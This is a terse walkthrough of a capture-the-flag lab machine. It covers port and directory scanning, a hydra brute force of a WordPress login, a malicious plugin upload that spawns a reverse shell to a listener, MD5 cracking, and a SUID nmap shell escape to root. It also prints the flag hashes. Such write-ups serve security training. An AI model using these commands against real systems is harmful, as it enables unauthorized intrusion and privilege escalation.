[*]
1. root@hostmachine:~# nmap 172.16.16.14
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-23 23:27 CDT
Nmap scan report for 172.16.16.14
Host is up (0.00028s latency).
Not shown: 997 filtered ports
PORT    STATE  SERVICE
22/tcp  closed ssh
80/tcp  open   http
443/tcp open   https
MAC Address: 08:00:27:5C:15:C1 (Oracle VirtualBox virtual NIC)
[*]
2. Finding all web dirs with gobuster
gobuster -u 172.16.16.14 -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 80 -a Linux
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/.hta (Status: 403)
/0 (Status: 301)
/Image (Status: 301)
/admin (Status: 301)
/audio (Status: 301)
/atom (Status: 301)
/blog (Status: 301)
/css (Status: 301)
/dashboard (Status: 302)
/favicon.ico (Status: 200)
/feed (Status: 301)
/images (Status: 301)
/index.html (Status: 200)
/image (Status: 301)
/intro (Status: 200)
/index.php (Status: 301)
/js (Status: 301)
/license (Status: 200)
/login (Status: 302)
/page1 (Status: 301)
/phpmyadmin (Status: 403)
/readme (Status: 200)
/rdf (Status: 301)
/robots (Status: 200)
/robots.txt (Status: 200)
/rss (Status: 301)
/rss2 (Status: 301)
/sitemap (Status: 200)
/sitemap.xml (Status: 200)
/video (Status: 301)
/wp-admin (Status: 301)
/wp-content (Status: 301)
/wp-includes (Status: 301)
/wp-config (Status: 200)
/wp-cron (Status: 200)
/wp-load (Status: 200)
/wp-links-opml (Status: 200)
/wp-mail (Status: 403)
/wp-login (Status: 200)
/wp-signup (Status: 302)
[*]
3. Checking robots & robots.txt
**found interesting text
User-agent: *
fsocity.dic
key-1-of-3.txt
[*]
4. Found first flag
http://172.16.16.14/key-1-of-3.txt
073403c8a58a1f80d943455fb30724b9
[*]
5. Downloaded fsocity.dic
[*]
6. Brute forced wp-login page
hydra 172.16.16.14 -V http-form-post "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location" -l elliot -P key.txt
got passwd ER28-0652
[*]
7. Logged in as wp admin.Generated WP plugin payload, and got reverse shell
wordpwn 172.16.16.7 4444 **to generate malicious payload**
nc -nvlp 4444 **start listner**
http://172.16.16.14/wp-admin/plugin-install.php?tab=upload **visit page
http://172.16.16.14/wp-content/plugins/malicous/wetw0rk_maybe.php **kick off reverse shell**
**obtained reverse shell
[*]
8. Snooped around. Found second key in /home/robot/key-2-of-3.txt, but no read permissions. We need to pivot to this user
[*]
9. found password.raw-md5 in same folder
[*]
10. Cracked MD5 by going to rainbow table site hashkiller.co.uk/Cracker/MD5
 **password**
abcdefghijklmnopqrstuvwxyz
[*]
11. attempted to log in as robot. I was unable to due to terminal enviornment. Ran python shell
python -c 'import pty; pty.spawn("/bin/bash")'
[*]
12. Logged in as user
su - robot **passwd is abcdefghijklmnopqrstuvwxyz
python -c 'import pty; pty.spawn("/bin/bash")'
[*]
13. Grabbed flag 2
robot@linux:~$ cat *.txt
cat *.txt
822c73956184f694993bede3eb39f959
[*]
14. Tried to upload priv esc tools, but was permission locked. checking for escape sequence/interactive programs
find / -perm -4000 2>/dev/null
**nmap is an interactive tool
[*]
15. Launch nmap interactive and esc to shell
nmap --interactive
sh! **inside nmap shell*
id
uid=1002(robot) gid=1002(robot) euid=0(root) groups=0(root),1002(robot)
[*]
16. Grab flag!
# cat key-3-of-3.txt
cat key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4
073403c8a58a1f80d943455fb30724b9
822c73956184f694993bede3eb39f959
04787ddef27c3dee1ee161b21670b4e4
[*]